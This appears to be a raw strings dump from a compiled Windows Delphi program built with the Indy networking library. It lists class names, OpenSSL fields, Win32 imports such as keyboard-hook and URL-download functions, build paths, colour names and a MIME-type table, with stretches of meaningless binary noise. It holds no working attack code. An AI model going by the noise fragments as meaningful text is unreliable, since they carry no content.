TIdStackWindowsg
TIdStackWindowsg
ReceiveMsg
ReceiveMsg
WSTranslateSocketErrorMsg
WSTranslateSocketErrorMsg
SupportsIPv6
SupportsIPv6
TIdStackWindows
TIdStackWindows
EIdIPVersionUnsupported
EIdIPVersionUnsupported
ReceiveMsg,
ReceiveMsg,
EIdPortRequired
EIdPortRequired
EIdTCPConnectionError
EIdTCPConnectionError
EIdObjectTypeNotSupported
EIdObjectTypeNotSupported
IPAsString
IPAsString
QuoteHTTP
QuoteHTTP
Password
Password
IdHTTPHeaderInfo
IdHTTPHeaderInfo
FPassword
FPassword
FPort
FPort
ProxyPassword
ProxyPassword
ProxyPort\
ProxyPort\
Password\
Password\
FMetaHTTPEquiv
FMetaHTTPEquiv
TIdMetaHTTPEquivE
TIdMetaHTTPEquivE
ProcessMetaHTTPEquiv
ProcessMetaHTTPEquiv
TIdMetaHTTPEquiv
TIdMetaHTTPEquiv
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
VMsgEnd
VMsgEnd
FClientPortMin
FClientPortMin
FClientPortMax
FClientPortMax
FPeerPort
FPeerPort
ClientPortMin
ClientPortMin
ClientPortMax\
ClientPortMax\
PeerPort
PeerPort
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
OpenUDP
OpenUDP
CloseUDP
CloseUDP
RecvFromUDP
RecvFromUDP
SendToUDPm
SendToUDPm
FLastCmdResult
FLastCmdResult
TIdTCPConnectionB
TIdTCPConnectionB
RaiseExceptionForLastCmdResult
RaiseExceptionForLastCmdResult
SendCmd
SendCmd
SendCmdf
SendCmdf
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
LastCmdResult
LastCmdResult
FBoundPort
FBoundPort
FBoundPortMax
FBoundPortMax
FBoundPortMin
FBoundPortMin
TIdTCPClientCustom'
TIdTCPClientCustom'
TIdTCPClientCustom
TIdTCPClientCustom
IdTCPClient
IdTCPClient
BoundPort
BoundPort
BoundPortMax
BoundPortMax
BoundPortMin
BoundPortMin
TIdTCPClient
TIdTCPClient
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersionx7P
%EIdSocksUDPNotSupportedBySOCKSVersionx7P
saUsernamePassword
saUsernamePassword
FUDPSocksAssociation
FUDPSocksAssociation
SendToUDP9
SendToUDP9
FDefaultPort
FDefaultPort
DefaultPort
DefaultPort
BoundPortMinh(C
BoundPortMinh(C
fPassThrough
fPassThrough
PassThrough
PassThrough
MakeFTPSvrPort
MakeFTPSvrPort
MakeFTPSvrPasv
MakeFTPSvrPasv
FURL
FURL
CompressFTPDeflate
CompressFTPDeflate
CompressFTPToIO
CompressFTPToIO
DecompressFTPFromIO
DecompressFTPFromIO
DecompressFTPDeflate
DecompressFTPDeflate
CompressHTTPDeflate
CompressHTTPDeflate
DecompressHTTPDeflate
DecompressHTTPDeflate
URLDecode
URLDecode
URLEncode
URLEncode
Port\
Port\
FHttpOnly
FHttpOnly
HttpOnly\
HttpOnly\
FCommentURL
FCommentURL
FPortList
FPortList
FRecvPort
FRecvPort
FUsePort
FUsePort
CommentURL
CommentURL
PortCount
PortCount
UsePort
UsePort
RecvPort
RecvPort
AURL
AURL
rsa_keygen
rsa_keygen
dsa_keygen
dsa_keygen
pub_key
pub_key
priv_key
priv_key
PEVP_PKEY
PEVP_PKEY
EVP_PKEY_union
EVP_PKEY_union
EVP_PKEY
EVP_PKEY
pkey
pkey
pkey_type
pkey_type
required_pkey_type
required_pkey_type
key_len
key_len
key_length
key_length
AUTHORITY_KEYID
AUTHORITY_KEYID
keyid
keyid
PAUTHORITY_KEYIDh
PAUTHORITY_KEYIDh
X509_PUBKEY
X509_PUBKEY
public_key
public_key
PX509_PUBKEY`
PX509_PUBKEY`
X509_CERT_AUX
X509_CERT_AUX
PX509_CERT_AUX
PX509_CERT_AUX
cert_info
cert_info
ex_nscert
ex_nscert
get_cert_methods
get_cert_methods
cert_crl
cert_crl
ppem_password_cb
ppem_password_cb
key_arg_length
key_arg_length
key_arg
key_arg
master_key_length
master_key_length
master_key
master_key
sess_cert
sess_cert
Ptlsext_ticket_key_cb!
Ptlsext_ticket_key_cb!
cert_store
cert_store
default_passwd_callback
default_passwd_callback
default_passwd_callback_userdata
default_passwd_callback_userdata
client_cert_cb
client_cert_cb
extra_certs
extra_certs
max_cert_list
max_cert_list
cert
cert
msg_callback
msg_callback
msg_callback_arg
msg_callback_arg
client_cert_engine
client_cert_engine
tlsext_tick_key_name
tlsext_tick_key_name
tlsext_tick_hmac_key
tlsext_tick_hmac_key
tlsext_tick_aes_key
tlsext_tick_aes_key
tlsext_ticket_key_cb
tlsext_ticket_key_cb
init_msg
init_msg
read_key
read_key
write_key
write_key
key_material_length
key_material_length
key_material
key_material
tmp_cert_type
tmp_cert_type
tmp_cert_length
tmp_cert_length
tmp_cert_verify_md
tmp_cert_verify_md
tmp_cert_req
tmp_cert_req
tmp_key_block_length
tmp_key_block_length
tmp_key_block
tmp_key_block
tmp_cert_request
tmp_cert_request
msg_len
msg_len
w_msg_hdr
w_msg_hdr
r_msg_hdr
r_msg_hdr
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TCallbackExEvent
TCallbackExEvent
TPasswordEvent
TPasswordEvent
TPasswordEventEx
TPasswordEventEx
VPassword
VPassword
Certificate
Certificate
fsRootCertFile
fsRootCertFile
fsCertFile
fsCertFile
fsKeyFile
fsKeyFile
RootCertFile\
RootCertFile\
CertFile\
CertFile\
KeyFile
KeyFile
LoadRootCert
LoadRootCert
LoadCert
LoadCert
fPeerCert
fPeerCert
PeerCert
PeerCert
fOnGetPassword
fOnGetPassword
fOnGetPasswordEx
fOnGetPasswordEx
OnGetPassword
OnGetPassword
OnGetPasswordEx
OnGetPasswordEx
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertErrorpVR
EIdOSSLLoadingRootCertErrorpVR
EIdOSSLLoadingCertErrorXWR
EIdOSSLLoadingCertErrorXWR
EIdOSSLLoadingCertError0WR
EIdOSSLLoadingCertError0WR
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
SEC_GET_KEY_FN
SEC_GET_KEY_FN
KeyVer
KeyVer
pGetKeyFn
pGetKeyFn
pvGetKeyArgument
pvGetKeyArgument
EXPORT_SECURITY_CONTEXT_FN&
EXPORT_SECURITY_CONTEXT_FN&
IMPORT_SECURITY_CONTEXT_FN_W(
IMPORT_SECURITY_CONTEXT_FN_W(
ExportSecurityContext
ExportSecurityContext
ImportSecurityContextW
ImportSecurityContextW
aPassword
aPassword
6h|%S
6h|%S
TIdHTTPConnectionType
TIdHTTPConnectionType
IdHTTP
IdHTTP
TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPOnHeadersAvailable
FHTTP
FHTTP
TIdHTTPResponse7
TIdHTTPResponse7
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPRequest5
TIdHTTPRequest5
AHTTP
AHTTP
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocol;
TIdHTTPProtocol;
TIdHTTPProtocolx4S
TIdHTTPProtocolx4S
FHTTPProto
FHTTPProto
TIdCustomHTTP'
TIdCustomHTTP'
TIdCustomHTTP
TIdCustomHTTP
MetaHTTPEquiv
MetaHTTPEquiv
HTTPOptions -S
HTTPOptions -S
TIdHTTP|FS
TIdHTTP|FS
TIdHTTP
TIdHTTP
EIdHTTPProtocolExceptionn
EIdHTTPProtocolExceptionn
EIdHTTPProtocolException
EIdHTTPProtocolException
IFontAccessh
IFontAccessh
IPictureAccessh
IPictureAccessh
LicenseKey
LicenseKey
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNewWindow2
TWebBrowserNavigateComplete2
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserFileDownload
TWebBrowserNavigateError
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
%TWebBrowserPrivacyImpactedStateChange
FOnWindowSetResizable
FOnWindowSetResizable
FOnWindowSetLeft
FOnWindowSetLeft
FOnWindowSetTop
FOnWindowSetTop
FOnWindowSetWidth
FOnWindowSetWidth
FOnWindowSetHeight
FOnWindowSetHeight
TWebBrowser&
TWebBrowser&
cmdID
cmdID
cmdexecopt
cmdexecopt
TWebBrowser
TWebBrowser
OnWindowSetResizable
OnWindowSetResizable
OnWindowSetLeft$0T
OnWindowSetLeft$0T
OnWindowSetTop
OnWindowSetTop
OnWindowSetWidth
OnWindowSetWidth
OnWindowSetHeight
OnWindowSetHeight
LocationURL
LocationURL
UhCrT
UhCrT
EInvalidGridOperation
EInvalidGridOperation
goAlwaysShowEditor
goAlwaysShowEditor
Generics.Defaults
Generics.Defaults
Generics.Collections
Generics.Collections
UrlMon
UrlMon
IdTCPServer
IdTCPServer
IdCustomTCPServer
IdCustomTCPServer
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%
P%S%V%Y%\%
P%S%V%Y%\%
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
kernel32.dll
kernel32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
SetKeyboardState
SetKeyboardState
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyW
LoadKeyboardLayoutW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextW
GetKeyNameTextW
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
version.dll
version.dll
GetCPInfoExW
GetCPInfoExW
GetCPInfo
GetCPInfo
RegUnLoadKeyW
RegUnLoadKeyW
RegSaveKeyW
RegSaveKeyW
RegRestoreKeyW
RegRestoreKeyW
RegReplaceKeyW
RegReplaceKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegLoadKeyW
RegLoadKeyW
RegFlushKey
RegFlushKey
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
winspool.drv
winspool.drv
URLMON.DLL
URLMON.DLL
URLDownloadToFileW
URLDownloadToFileW
shell32.dll
shell32.dll
windowscodecs.dll
windowscodecs.dll
uxtheme.dll
uxtheme.dll
DWMAPI.DLL
DWMAPI.DLL
1$1$0,0004080
1$1$0,0004080
>#>'> >/>3>
>#>'> >/>3>
7#7'7 7/73777
7#7'7 7/73777
0D1r1D3H3L3P3T3X3\3`3d3h3l3p3t3%4U4>6
0D1r1D3H3L3P3T3X3\3`3d3h3l3p3t3%4U4>6
7v7D7}7
7v7D7}7
0-0K0Y0g0}0
0-0K0Y0g0}0
=(=,=
=(=,=
>~> ?@?[?
>~> ?@?[?
7v7D7
7v7D7
8"8&8*8.828
8"8&8*8.828
?$?[?_?}?
?$?[?_?}?
3
: :$:(:,:0:4:8:<:>0 0$0(0,0004080`06 6(60686@64D4F4[4i4y48ƒ8D8[8i8y83?3l3: :?:[:{:-060Q0g0}0=^=090=0\0`09!9œ9G9K9h9l9p910141[1_125292\2`23 3?3^3~3KWindowsCGenerics.Defaults0IdHTTPHeaderInfoIdTCPServerFont.CharsetFont.ColorFont.HeightFont.NameFont.StylePicture.Data%u,vbv w.RXd56Ba %CRbq-7b1%u$^%f Dt%Ud8uYr%1U($u%F)`$xP%f.Ki[%.qms$5.RVXLy".AG}#%CQtNA>#w*.yb%D]tcbJ]Lines.StringsProxyParams.BasicAuthenticationProxyParams.ProxyPortRequest.ContentLengthRequest.ContentRangeEndRequest.ContentRangeStart"Request.ContentRangeInstanceLengthRequest.AcceptRequest.BasicAuthenticationRequest.UserAgent&Mozilla/3.0 (compatible; Indy Library)Request.Ranges.UnitsRequest.RangesHTTPOptionsS5%DO#A%d"ûTqz3I%.vr\,,6%dri%DScpversion="15.0.3890.34076"name="Microsoft.Windows.Common-Controls"version="6.0.0.0"publicKeyToken="6595b64144ccf1df"MSWHEEL_ROLLMSGMSH_WHEELSUPPORT_MSGMSH_SCROLL_LINES_MSGC:\Builds\TP\rtl\sys\SysUtils.pas%s-%sC:\Builds\TP\rtl\common\TypInfo.pas%s[%d]%s_%d.OwnerC:\Builds\TP\rtl\common\Classes.pasC:\Builds\TP\rtl\common\SyncObjs.pas\\?\UNC\HKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_CURRENT_CONFIGHKEY_DYN_DATA%s (*.%s)|*.%1:s%s (%s)|%1:s|SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutescrSQLWait%s (%s)imm32.dll\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\clWebSnowclWebFloralWhiteclWebLavenderBlushclWebOldLaceclWebIvoryclWebCornSilkclWebBeigeclWebAntiqueWhiteclWebWheatclWebAliceBlueclWebGhostWhiteclWebLavenderclWebSeashellclWebLightYellowclWebPapayaWhipclWebNavajoWhiteclWebMoccasinclWebBurlywoodclWebAzureclWebMintcreamclWebHoneydewclWebLinenclWebLemonChiffonclWebBlanchedAlmondclWebBisqueclWebPeachPuffclWebTanclWebYellowclWebDarkOrangeclWebRedclWebDarkRedclWebMaroonclWebIndianRedclWebSalmonclWebCoralclWebGoldclWebTomatoclWebCrimsonclWebBrownclWebChocolateclWebSandyBrownclWebLightSalmonclWebLightCoralclWebOrangeclWebOrangeRedclWebFirebrickclWebSaddleBrownclWebSiennaclWebPeruclWebDarkSalmonclWebRosyBrownclWebPaleGoldenrodclWebLightGoldenrodYellowclWebOliveclWebForestGreenclWebGreenYellowclWebChartreuseclWebLightGreenclWebAquamarineclWebSeaGreenclWebGoldenRodclWebKhakiclWebOliveDrabclWebGreenclWebYellowGreenclWebLawnGreenclWebPaleGreenclWebMediumAquamarineclWebMediumSeaGreenclWebDarkGoldenRodclWebDarkKhakiclWebDarkOliveGreenclWebDarkgreenclWebLimeGreenclWebLimeclWebSpringGreenclWebMediumSpringGreenclWebDarkSeaGreenclWebLightSeaGreenclWebPaleTurquoiseclWebLightCyanclWebLightBlueclWebLightSkyBlueclWebCornFlowerBlueclWebDarkBlueclWebIndigoclWebMediumTurquoiseclWebTurquoiseclWebCyanclWebPowderBlueclWebSkyBlueclWebRoyalBlueclWebMediumBlueclWebMidnightBlueclWebDarkTurquoiseclWebCadetBlueclWebDarkCyanclWebTealclWebDeepskyBlueclWebDodgerBlueclWebBlueclWebNavyclWebDarkVioletclWebDarkOrchidclWebMagentaclWebDarkMagentaclWebMediumVioletRedclWebPaleVioletRedclWebBlueVioletclWebMediumOrchidclWebMediumPurpleclWebPurpleclWebDeepPinkclWebLightPinkclWebVioletclWebOrchidclWebPlumclWebThistleclWebHotPinkclWebPinkclWebLightSteelBlueclWebMediumSlateBlueclWebLightSlateGrayclWebWhiteclWebLightgreyclWebGrayclWebSteelBlueclWebSlateBlueclWebSlateGrayclWebWhiteSmokeclWebSilverclWebDimGrayclWebMistyRoseclWebDarkSlateBlueclWebDarkSlategrayclWebGainsboroclWebDarkGrayclWebBlackSystem\CurrentControlSet\Control\Keyboard Layouts\%.8xC:\Builds\TP\indysockets\lib\system\IdStreamVCL.pasC:\Builds\TP\indysockets\lib\system\IdGlobal.pas%s, %.2d %s %.4d %s %s%s, %.2d-%s-%.2d %s %sWS2_32.DLLgetservbyportWSAAsyncGetServByPortWSAJoinLeafMSWSOCK.DLLWSARecvMsgWSASendMsgWship6.dllFwpuclnt.dll127.0.0.1C:\Builds\TP\indysockets\lib\system\IdStack.pasISO_646.irv:1991ISO_646.basic:1983ISO_646.irv:1983csISO16PortuguesecsISO84Portuguese2csShiftJISISO-8859-1-Windows-3.0-Latin-1csWindows30Latin1ISO-8859-1-Windows-3.1-Latin-1csWindows31Latin1ISO-8859-2-Windows-Latin-2csWindows31Latin2ISO-8859-9-Windows-Latin-5csWindows31Latin5csMicrosoftPublishingWindows-31JcsWindows31JPTCP154csPTCP15410.5.7.nml=animation/narrative.aac=audio/mp4.aif=audio/x-aiff.aifc=audio/x-aiff.aiff=audio/x-aiff.au=audio/basic.gsm=audio/x-gsm.kar=audio/midi.m3u=audio/mpegurl.mid=audio/midi.midi=audio/midi.mpega=audio/x-mpg.mp2=audio/x-mpg.mp3=audio/x-mpg.mpga=audio/x-mpg.m3u=audio/x-mpegurl.pls=audio/x-scpls.qcp=audio/vnd.qcelp.ra=audio/x-realaudio.ram=audio/x-pn-realaudio.rm=audio/x-pn-realaudio.sd2=audio/x-sd2.sid=audio/prs.sid.snd=audio/basic.wav=audio/x-wav.wax=audio/x-ms-wax.wma=audio/x-ms-wma.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile.art=image/x-jg.bmp=image/bmp.cdr=image/x-coreldraw.cdt=image/x-coreldrawtemplate.cpt=image/x-corelphotopaint.djv=image/vnd.djvu.djvu=image/vnd.djvu.gif=image/gif.ief=image/ief.ico=image/x-icon.jng=image/x-jng.jpg=image/jpeg.jpeg=image/jpeg.jpe=image/jpeg.pat=image/x-coreldrawpattern.pcx=image/pcx.pbm=image/x-portable-bitmap.pgm=image/x-portable-graymap.pict=image/x-pict.png=image/x-png.pnm=image/x-portable-anymap.pntg=image/x-macpaint.ppm=image/x-portable-pixmap.psd=image/x-psd.qtif=image/x-quicktime.ras=image/x-cmu-raster.rf=image/vnd.rn-realflash.rgb=image/x-rgb.rp=image/vnd.rn-realpix.sgi=image/x-sgi.svg=image/svg-xml.svgz=image/svg-xml.targa=image/x-targa.tif=image/x-tiff.wbmp=image/vnd.wap.wbmp.xbm=image/xbm.xbm=image/x-xbitmap.xpm=image/x-xpixmap.xwd=image/x-xwindowdump.xml=text/xml.uls=text/iuls.txt=text/plain.rtx=text/richtext.wsc=text/scriptlet.rt=text/vnd.rn-realtext.htt=text/webviewhtml.htc=text/x-component.vcf=text/x-vcard.asf=video/x-ms-asf.asx=video/x-ms-asf.avi=video/x-msvideo.dl=video/dl.dv=video/dv.flc=video/flc.fli=video/fli.gl=video/gl.lsf=video/x-la-asf.lsx=video/x-la-asf.mng=video/x-mng.mp2=video/mpeg.mp3=video/mpeg.mp4=video/mpeg.mpeg=video/x-mpeg2a.mpa=video/mpeg.mpe=video/mpeg.mpg=video/mpeg.moov=video/quicktime.mov=video/quicktime.mxu=video/vnd.mpegurl.qt=video/quicktime.qtc=video/x-qtc.rv=video/vnd.rn-realvideo.ivf=video/x-ivf.wm=video/x-ms-wm.wmp=video/x-ms-wmp.wmv=video/x-ms-wmv.wmx=video/x-ms-wmx.wvx=video/x-ms-wvx.rms=video/vnd.rn-realvideo-secure.asx=video/x-ms-asf-plugin.movie=video/x-sgi-movie.aab=application/x-authorware-bin.aam=application/x-authorware-map.aas=application/x-authorware-seg.abw=application/x-abiword.ace=application/x-ace-compressed.ai=application/postscript.alz=application/x-alz-compressed.ani=application/x-navi-animation.arj=application/x-arj.asf=application/vnd.ms-asf.bat=application/x-msdos-program.bcpio=application/x-bcpio.boz=application/x-bzip2.bz=application/x-bzip.bz2=application/x-bzip2.cab=application/vnd.ms-cab-compressed.cat=application/vnd.ms-pki.seccat.ccn=application/x-cnc.cco=application/x-cocoa.cdf=application/x-cdf.cer=application/x-x509-ca-cert.chm=application/vnd.ms-htmlhelp.chrt=application/vnd.kde.kchart.cil=application/vnd.ms-artgalry.class=application/java-vm.com=application/x-msdos-program.clp=application/x-msclip.cpio=application/x-cpio.cpt=application/mac-compactpro.cqk=application/x-calquick.crd=application/x-mscardfile.crl=application/pkix-crl.csh=application/x-csh.dar=application/x-dar.dbf=application/x-dbase.dcr=application/x-director.deb=application/x-debian-package.dir=application/x-director.dist=vnd.apple.installer xml.distz=vnd.apple.installer xml.dll=application/x-msdos-program.dmg=application/x-apple-diskimage.doc=application/msword.dot=application/msword.dvi=application/x-dvi.dxr=application/x-director.ebk=application/x-expandedbook.eps=application/postscript.evy=application/envoy.exe=application/x-msdos-program.fdf=application/vnd.fdf.fif=application/fractals.flm=application/vnd.kde.kivio.fml=application/x-file-mirror-list.gzip=application/x-gzip.gnumeric=application/x-gnumeric.gtar=application/x-gtar.gz=application/x-gzip.hdf=application/x-hdf.hlp=application/winhlp.hpf=application/x-icq-hpf.hqx=application/mac-binhex40.hta=application/hta.ims=application/vnd.ms-ims.ins=application/x-internet-signup.iii=application/x-iphone.iso=application/x-iso9660-image.jar=application/java-archive.karbon=application/vnd.kde.karbon.kfo=application/vnd.kde.kformula.kon=application/vnd.kde.kontour.kpr=application/vnd.kde.kpresenter.kpt=application/vnd.kde.kpresenter.kwd=application/vnd.kde.kword.kwt=application/vnd.kde.kword.latex=application/x-latex.lha=application/x-lzh.lcc=application/fastman.lrm=application/vnd.ms-lrm.lz=application/x-lzip.lzh=application/x-lzh.lzma=application/x-lzma.lzo=application/x-lzop.lzx=application/x-lzx.mpp=application/vnd.ms-project.mvb=application/x-msmediaview.man=application/x-troff-man.mdb=application/x-msaccess.me=application/x-troff-me.ms=application/x-troff-ms.msi=application/x-msi.mpkg=vnd.apple.installer xml.mny=application/x-msmoney.nix=application/x-mix-transfer.oda=application/oda.odb=application/vnd.oasis.opendocument.database.odc=application/vnd.oasis.opendocument.chart.odf=application/vnd.oasis.opendocument.formula.odg=application/vnd.oasis.opendocument.graphics.odi=application/vnd.oasis.opendocument.image.odm=application/vnd.oasis.opendocument.text-master.odp=application/vnd.oasis.opendocument.presentation.ods=application/vnd.oasis.opendocument.spreadsheet.ogg=application/ogg.odt=application/vnd.oasis.opendocument.text.otg=application/vnd.oasis.opendocument.graphics-template.oth=application/vnd.oasis.opendocument.text-web.otp=application/vnd.oasis.opendocument.presentation-template.ots=application/vnd.oasis.opendocument.spreadsheet-template.ott=application/vnd.oasis.opendocument.text-template.p7b=application/x-pkcs7-certificates.p7r=application/x-pkcs7-certreqresp.package=application/vnd.autopackage.pfr=application/font-tdpfr.pkg=vnd.apple.installer xml.pdf=application/pdf.pko=application/vnd.ms-pki.pko.pl=application/x-perl.pnq=application/x-icq-pnq.pot=application/mspowerpoint.pps=application/mspowerpoint.ppt=application/mspowerpoint.ppz=application/mspowerpoint.ps=application/postscript.pub=application/x-mspublisher.qpw=application/x-quattropro.qtl=application/x-quicktimeplayer.rar=application/rar.rdf=application/rdf xml.rjs=application/vnd.rn-realsystem-rjs.rm=application/vnd.rn-realmedia.rmf=application/vnd.rmf.rmp=application/vnd.rn-rn_music_package.rmx=application/vnd.rn-realsystem-rmx.rnx=application/vnd.rn-realplayer.rpm=application/x-redhat-package-manager.rsml=application/vnd.rn-rsml.rtsp=application/x-rtsp.rss=application/rss xml.scm=application/x-icq-scm.ser=application/java-serialized-object.scd=application/x-msschedule.sda=application/vnd.stardivision.draw.sdc=application/vnd.stardivision.calc.sdd=application/vnd.stardivision.impress.sdp=application/x-sdp.setpay=application/set-payment-initiation.setreg=application/set-registration-initiation.sh=application/x-sh.shar=application/x-shar.shw=application/presentations.sit=application/x-stuffit.sitx=application/x-stuffitx.skd=application/x-koan.skm=application/x-koan.skp=application/x-koan.skt=application/x-koan.smf=application/vnd.stardivision.math.smi=application/smil.smil=application/smil.spl=application/futuresplash.ssm=application/streamingmedia.sst=application/vnd.ms-pki.certstore.stc=application/vnd.sun.xml.calc.template.std=application/vnd.sun.xml.draw.template.sti=application/vnd.sun.xml.impress.template.stl=application/vnd.ms-pki.stl.stw=application/vnd.sun.xml.writer.template.svi=application/softvision.sv4cpio=application/x-sv4cpio.sv4crc=application/x-sv4crc.swf=application/x-shockwave-flash.swf1=application/x-shockwave-flash.sxc=application/vnd.sun.xml.calc.sxi=application/vnd.sun.xml.impress.sxm=application/vnd.sun.xml.math.sxw=application/vnd.sun.xml.writer.sxg=application/vnd.sun.xml.writer.global.tar=application/x-tar.tcl=application/x-tcl.tex=application/x-tex.texi=application/x-texinfo.texinfo=application/x-texinfo.tbz=application/x-bzip-compressed-tar.tbz2=application/x-bzip-compressed-tar.tgz=application/x-compressed-tar.tlz=application/x-lzma-compressed-tar.tr=application/x-troff.trm=application/x-msterminal.troff=application/x-troff.tsp=application/dsptype.torrent=application/x-bittorrent.ttz=application/t-time.txz=application/x-xz-compressed-tar.udeb=application/x-debian-package.uin=application/x-icq.urls=application/x-url-list.ustar=application/x-ustar.vcd=application/x-cdlink.vor=application/vnd.stardivision.writer.vsl=application/x-cnet-vsl.wcm=application/vnd.ms-works.wb1=application/x-quattropro.wb2=application/x-quattropro.wb3=application/x-quattropro.wdb=application/vnd.ms-works.wks=application/vnd.ms-works.wmd=application/x-ms-wmd.wms=application/x-ms-wms.wmz=application/x-ms-wmz.wp5=application/wordperfect5.1.wpd=application/wordperfect.wpl=application/vnd.ms-wpl.wps=application/vnd.ms-works.wri=application/x-mswrite.xfdf=application/vnd.adobe.xfdf.xls=application/x-msexcel.xlb=application/x-msexcel.xpi=application/x-xpinstall.xps=application/vnd.ms-xpsdocument.xsd=application/vnd.sun.xml.draw.xul=application/vnd.mozilla.xul xml.zoo=application/x-zoo.zip=application/x-zip-compressed.wml=text/vnd.wap.wml.wmlc=application/vnd.wap.wmlc.wmls=text/vnd.wap.wmlscript.wmlsc=application/vnd.wap.wmlscriptc.asm=text/x-asm.pas=text/x-pascal.cs=text/x-csharp.cpp=text/x-c src.cxx=text/x-c src.cc=text/x-c src.hpp=text/x-c hdr.hxx=text/x-c hdr.hh=text/x-c hdr.java=text/x-java.css=text/css.js=text/javascript.htm=text/html.html=text/html.ls=text/javascript.mocha=text/javascript.shtml=server-parsed-html.sgm=text/sgml.sgml=text/sgmlC:\Builds\TP\indysockets\lib\protocols\IdGlobalProtocols.pasHTTP-EQUIV()@,;:\"./()@,;:\"/[]?=()@,;:\"/[]?={}TIdEncoder3to4.Encode: Calculated length exceeded (expectedC:\Builds\TP\indysockets\lib\protocols\IdCoder3to4.pasTIdEncoder3to4.Encode: Calculated length not met (expectedX-HTTP-Method-OverrideMozilla/3.0 (compatible; Indy Library)%d-%dC:\Builds\TP\indysockets\lib\core\IdIOHandler.pas255.255.255.2550.0.0.0C:\Builds\TP\indysockets\lib\core\IdIOHandlerStack.pas0.0.0.1C:\Builds\TP\indysockets\lib\core\IdThread.pasC:\Builds\TP\indysockets\lib\core\IdScheduler.pasC:\Builds\TP\indysockets\lib\protocols\IdZLibCompressorBase.pas*#%"{}|\^[]`*#%"{}|\^[]`HTTPS.localHttpOnlyC:\Builds\TP\indysockets\lib\protocols\IdCookie.pasHTTPONLY$PortCOMMENTURLPORTWINDOWSC:\Builds\TP\indysockets\lib\protocols\IdHeaderCoderIndy.pas()[]:;.,@\"Content-Disposition: form-data; name="%s"; filename="%s"Content-Type: %s; charset="%s"Content-Transfer-Encoding: 